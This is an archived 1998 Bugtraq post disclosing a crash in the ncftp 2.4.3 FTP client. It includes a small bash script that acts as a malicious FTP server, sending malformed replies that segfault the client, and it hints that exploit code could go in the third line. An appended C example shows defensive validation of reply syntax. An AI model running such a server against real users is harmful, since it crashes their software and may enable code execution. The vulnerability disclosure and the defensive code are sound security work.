Bugtraq mailing list archives
ncftp 2.4.3 bug
From: paul () BOEHM ORG (Paul Boehm)
Date: Sun, 21 Jun 1998 00:52:33 +0200
Hi,

i think i've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to an ftp server that responds with something like the shit below
ncftp2.4.3 segfaults. i think this is exploitable, but had no time/motivation
to look further into it. probably this isn't very dangerous anyway cause your
victim needs to connect willingly, and using ncftp to your server.. that won't
happen very often unless you've been talking with your victim before.
anyway i thought it may be a good idea to post it, so here it is:

--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by infected () cia at
# Start this using inetd. (port 21)
echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--

every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]

bye,
paul

PS: i have no clue why this crashes ncftp... i haven't looked through ncftp's
source, but maybe someone else will.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Name: Paul S. Boehm || Freelance Security Consulter.
Email: paul () is destructive org || PGPkey available at:
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is no reason for any individual to have a computer in their home.
--Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
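Added example, not part of the original post and not ncftp's code: the post does not identify why ncftp crashes, so this makes no claim about the cause. It shows a client-side check that classifies each server line against RFC 959 reply syntax, so a line with no reply code outside a multiline reply (like the third line of the script above) is rejected before any further processing. The names ftp_check_line, ftp_reply_state and the 512-byte line cap are assumptions.

```c
#include <stdio.h>

#define FTP_MAX_LINE 512  /* assumed cap; longer lines are rejected, not truncated */

enum ftp_verdict { FTP_FINAL, FTP_MORE, FTP_MALFORMED };
struct ftp_reply_state { int open_code; /* code of an open "ddd-" reply, 0 if none */ };

/* Return the 3-digit reply code if line starts with "ddd " or "ddd-", else 0. */
static int leading_code(const char *line, size_t len)
{
    if (len < 4 || line[0] < '1' || line[0] > '5' ||
        line[1] < '0' || line[1] > '9' || line[2] < '0' || line[2] > '9')
        return 0;
    if (line[3] != ' ' && line[3] != '-')
        return 0;
    return (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
}

/* Classify one server line (CRLF already stripped) against RFC 959 reply syntax. */
enum ftp_verdict ftp_check_line(struct ftp_reply_state *st, const char *line)
{
    size_t len = 0;
    while (line[len] != '\0')
        if (++len > FTP_MAX_LINE) return FTP_MALFORMED;
    int code = leading_code(line, len);
    if (st->open_code) {                  /* inside a multiline reply */
        if (code == st->open_code && line[3] == ' ') {
            st->open_code = 0;            /* "ddd " with the same code closes it */
            return FTP_FINAL;
        }
        return FTP_MORE;                  /* free-form continuation text is legal here */
    }
    if (!code)
        return FTP_MALFORMED;             /* no reply code and no open multiline reply */
    if (line[3] == '-') {
        st->open_code = code;             /* "ddd-" opens a multiline reply */
        return FTP_MORE;
    }
    return FTP_FINAL;
}

int main(void)
{
    /* Sample input: the three lines echoed by the script in the post. */
    const char *lines[] = { "331 hi, barbie.. wanna crash with me?", "230 sure ken!", "then hop in" };
    struct ftp_reply_state st = {0};
    for (int i = 0; i < 3; i++)
        printf("%d  %s\n", ftp_check_line(&st, lines[i]), lines[i]);
    return 0;
}
```

A client would drop the control connection on FTP_MALFORMED instead of handing the line to its reply handler.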